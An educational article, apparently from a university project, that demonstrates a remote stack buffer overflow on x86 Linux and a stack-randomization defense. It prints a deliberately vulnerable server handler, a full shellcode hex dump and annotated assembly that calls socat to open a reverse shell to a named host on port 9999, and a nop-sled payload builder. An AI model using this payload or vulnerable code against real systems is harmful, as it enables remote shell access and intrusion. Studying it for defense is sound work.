A Remote Exploit and its Counter

This project was done on a Linux system running on an x86 machine, and the article assumes this environment throughout.

Remote Exploit


The remote exploit demonstrated in this project is a general remote buffer overflow exploit. Put simply, the idea is that the server uses a buffer on its stack to store input from the network and, while doing so, fails to check the buffer's bounds. This allows a malicious attacker to send a payload which overflows the buffer and corrupts the server's stack.

However, corrupting the server's execution stack arbitrarily merely causes the server to crash, which is not our primary motive. We would like to corrupt the stack in such a way that we are able to execute arbitrary code on the server machine. Hence a specially fabricated payload is sent to the server which includes code and some trickery, causing the server to corrupt its stack and execute the code sent.

At a high level, a remote exploit works in the following manner. The execution stack of a process contains activation records of the functions the process visits. At any point in time, the stack holds the activation records of all the functions which the process has entered and not yet exited. When a function calls another function, a return address (inside the caller's code) is saved on the stack, which enables the process to resume the caller once the called function is done. It is this return address which is clobbered by the malicious payload: the buffer is overflowed until it hits the return address. The attacker attempts to clobber the return address on the stack with an address which points to the code sent in the payload. If things go fine (usually after some trial and error on the part of the attacker), then instead of returning to the caller, the code in the payload is executed, giving the attacker a way to run arbitrary code on the system.


A custom server has been written to demonstrate the remote exploit. This server expects a string (say the name of a person) and returns a new string which includes the name and a message with it. The code which processes the request is shown below.

void handle_request(int client_fd)
{
        char name[BUF_SIZE];
        int r, t=0;
        int rand;

        fprintf(stderr, "address of name is %x\n", (unsigned int)name);
        //This loop is the buffer overflow vulnerability. It writes to name[] till EOF and not till name[] is full.
        while ((r = read(client_fd, (char*)(name+t), BLK_SIZE)) > 0)
                t += r;
        //Null terminate the data we got so that we can print it.
        *((char*)(name+t)) = '\0';

        //Process the request.
        fd_send(client_fd, name, strlen(name));
        //Get a random message based on the time.
        rand = (int)(time(NULL) % MAX_MSGS);
        fd_send(client_fd, msg[rand], strlen(msg[rand]));
}

Note that the buffer for the name is kept as a local variable (and hence allocated on the stack), and though its size is fixed, the loop following it writes to the buffer without any checks on its bounds. This represents a very typical buffer overflow vulnerability. We also print the address of the start of this buffer for our convenience, so that we know where our payload is going to be situated in memory.
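For contrast, a bounds-checked version of the loop would cap the total bytes stored at the buffer's capacity. The sketch below simulates the socket reads with an in-memory source so it can be exercised standalone; BUF_SIZE and the helper name are illustrative, not part of the demonstration server.

```c
#include <stddef.h>

#define BUF_SIZE 64

/* Copies at most cap-1 bytes from src into dst (standing in for reads
   from the socket), always leaving room for the null terminator.
   Requires cap >= 1. Returns the number of bytes stored. */
size_t bounded_fill(char *dst, size_t cap, const char *src, size_t src_len)
{
    size_t t = 0;
    while (t < src_len && t < cap - 1) {  /* the check the server lacks */
        dst[t] = src[t];
        t++;
    }
    dst[t] = '\0';
    return t;
}
```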
Recalling that the stack grows downwards (high memory to low memory) on x86 systems, we see that overflowing the buffer name[] eventually hits the word on the stack which stores the return address to the caller of handle_request. We now construct a malicious payload (our implementation includes a program which does that) such that it is padded with a “guessed” return address towards the end. The malicious payload looks something like this:

000000  90 90 eb 32 5e 89 76 30  8d 46 0f 89 46 34 8d 46  |...2^.v0.F..F4.F|
000010  23 89 46 38 c7 46 3c 00  00 00 00 b8 0b 00 00 00  |#.F8.F<.........|
000020  8d 4e 30 89 f3 8d 56 3c  cd 80 bb 00 00 00 00 b8  |.N0...V<........|
000030  01 00 00 00 cd 80 e8 c9  ff ff ff 2f 75 73 72 2f  |.........../usr/|
000040  62 69 6e 2f 73 6f 63 61  74 00 54 43 50 3a 72 69  |bin/socat.TCP:ri|
000050  74 65 73 68 31 2d 63 73  3a 39 39 39 39 00 45 58  |tesh1-cs:9999.EX|
000060  45 43 3a 2f 62 69 6e 2f  73 68 00 00 00 00 00 00  |EC:/bin/sh......|
000070  00 00 00 00 00 00 00 00  c0 f2 ff bf c0 f2 ff bf  |................|

Our guessed stack address is 0xbffff2c0, which we can see appearing twice at the end of the payload. The little-endianness of the x86 architecture accounts for the bytes appearing in reverse order. The rest of the bytes are the machine code representation of the following assembly program:

.globl _start
        .type   _start, @function
# We directly start with a _start label and don't bother with any C startup code. Similarly, we won't link against glibc for making system calls.
_start:
        jmp     L1              # 2 bytes (jump to the call instruction)
L2:
        popl    %esi            # 1 byte (the address of "/usr/bin/socat" is now in %esi, because the call just before the string pushed it as a return address and jumped back to this instr.)
        movl    %esi, 48(%esi)  # 3 bytes (store the address of "/usr/bin/socat" as argv[0])
        leal    15(%esi), %eax  # 3 bytes (compute the address of the "TCP:..." string)
        movl    %eax, 52(%esi)  # 3 bytes (store it as argv[1])
        leal    35(%esi), %eax  # 3 bytes (compute the address of the "EXEC:..." string)
        movl    %eax, 56(%esi)  # 3 bytes (store it as argv[2])
        movl    $0, 60(%esi)    # 7 bytes (store the NULL that terminates argv, right after argv[2])
        movl    $0xb, %eax      # 5 bytes (0xb is the execve sys_call)
        leal    48(%esi), %ecx  # 3 bytes (argv pointer for the sys call)
        movl    %esi, %ebx      # 2 bytes (path pointer for the sys call)
        leal    60(%esi), %edx  # 3 bytes (envp pointer for the sys call)
        int     $0x80           # 2 bytes

# exit code
        movl    $0, %ebx        # 5 bytes
        movl    $1, %eax        # 5 bytes (0x1 is the exit sys_call)
        int     $0x80           # 2 bytes
L1:
        call    L2              # 5 bytes (pushes the address of the string below, then jumps back to the popl)
        .string "/usr/bin/socat"        # 15 bytes with the null terminator
        .string "TCP:ritesh1-cs:9999"   # 20 bytes with null terminator
        .string "EXEC:/bin/sh"  # 13 bytes with null terminator
#       The address of "/usr/bin/socat" is kept here (offset 48).
#       The address of the "TCP:..." string is kept here (offset 52).
#       The address of the "EXEC:..." string is kept here (offset 56).
#       A zero is kept here (offset 60) to terminate argv for the execve syscall.

If we assume that control somehow reaches the start of this code (which is why we pad the payload with the return address at the end), then we see that, using a jmp and a call, the program tricks the machine into pushing the address of the strings at the end onto the stack. It then pops that address out and calls execve with the string as the program to execute. This program (/usr/bin/socat with its options) makes a connection to a specific machine (ritesh1-cs.cs.unc.edu in our case) and attaches a shell to that connection, so the remote end can feed it commands. Thus, if this code is executed, ritesh1-cs will see a connection request; when accepted, it gives us access to a shell (/bin/sh) running on the remote system.
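What the shellcode's system call amounts to can be written as ordinary C. The argv array below mirrors the pointer block the code builds at 48(%esi), terminated by the zero word at 60(%esi); the path is taken as a parameter only so this sketch can be exercised without socat actually being installed.

```c
#include <unistd.h>

/* Issues the same execve the shellcode makes: argv[0] is the program
   path, argv[1] the connect-back address, argv[2] the shell to attach,
   and envp is an empty array. Returns only if execve fails. */
int run_connect_back(const char *socat_path)
{
    char *const argv[] = {
        (char *)socat_path,
        "TCP:ritesh1-cs:9999",   /* connect back to the attacker */
        "EXEC:/bin/sh",          /* ...and hand it a shell       */
        NULL                     /* the zero word at 60(%esi)    */
    };
    char *const envp[] = { NULL };
    return execve(argv[0], argv, envp);
}
```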
The only task which remains is to guess the address of the buffer where the payload will be situated, so that we can construct a payload with that address padded towards its end. A real attacker can only guess this address; in our implementation, however, we print the address of the buffer for convenience and construct the payload using it.
Note that the size of our code in the payload may not be an integral number of words; in such a case we pad it with nops at the front to make it so. Padding with nops also takes some of the guesswork out of the return address: any guessed address that lands anywhere in the run of nops slides down into our code, so in a trial and error session one can step through candidate addresses in larger strides.
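The payload-building program mentioned earlier can be sketched as follows. The layout matches the hex dump: a nop sled at the front, the shellcode, and the guessed return address repeated over the trailing words. PAYLOAD_SIZE, the function name, and the sizes used below are illustrative.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PAYLOAD_SIZE 128

/* Fills buf (PAYLOAD_SIZE bytes) with: a nop sled, the shellcode, then
   the guessed return address repeated over the last addr_words words.
   Requires code_len + 4*addr_words <= PAYLOAD_SIZE. */
void build_payload(unsigned char *buf,
                   const unsigned char *shellcode, size_t code_len,
                   uint32_t guessed_addr, size_t addr_words)
{
    size_t sled = PAYLOAD_SIZE - code_len - addr_words * 4;

    memset(buf, 0x90, sled);                  /* 0x90 is the x86 nop */
    memcpy(buf + sled, shellcode, code_len);  /* the injected code   */

    for (size_t i = 0; i < addr_words; i++) {
        /* store the guessed address little-endian, as x86 expects */
        unsigned char *w = buf + sled + code_len + 4 * i;
        w[0] =  guessed_addr        & 0xff;
        w[1] = (guessed_addr >> 8)  & 0xff;
        w[2] = (guessed_addr >> 16) & 0xff;
        w[3] = (guessed_addr >> 24) & 0xff;
    }
}
```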

The Counter


The basic idea of the counter comes from the fact that the attacker has to be good at guessing the address of the buffer where the payload will be loaded. In general, standard systems with default configurations show little variation in the placement of activation records on the stack from system to system. Thus, having learned the address of a buffer on one system, an attacker can easily guess (within a few trials) the address of the buffer on another system. However, if on every trial by the attacker the activation record of the vulnerable function is placed at a different, random location on the stack, then the attacker will not be able to guess it even over many trials. We will henceforth call this technique Stack Randomization and will see a way to implement it easily.
Note that this technique has a few limitations. First, it is not possible to stop the attacker from guessing the randomized address of the buffer once the server has already been started. Thus, if the server is, say, a forking server, the address of the buffer is the same in the various forks of the same process. The attacker could potentially use this to guess the address after a number of tries. However, if the server crashes and respawns while being attacked (which might happen if the attacker is trying different kinds of payload on it), then the stack address is randomized once again.
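One simple way to implement the randomization, sketched under the assumption that we can wrap the vulnerable handler, is to consume a random amount of stack (via alloca) before calling it, so its frame lands at a different address each time the server starts. The function names below are illustrative, and the handler is a stand-in that just reports where its buffer landed.

```c
#include <alloca.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for the vulnerable handler: returns the address of its local
   buffer so we can observe where its frame landed. */
uintptr_t handler_buffer_address(void)
{
    char name[64];
    name[0] = '\0';
    return (uintptr_t)name;
}

/* Calls the handler after consuming `shift` extra bytes of stack. A real
   server would draw `shift` once, at startup, from a random source, so
   the buffer's address becomes unpredictable across restarts. */
uintptr_t randomized_call(size_t shift)
{
    volatile char *pad = alloca(shift + 16);
    pad[0] = 0;   /* touch the block so it is not optimized away */
    return handler_buffer_address();
}
```

Different shift values push the handler's frame to different depths, which is exactly what defeats a fixed guessed return address.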


Please read the accompanying document for the rest of the content. The source code is present here.

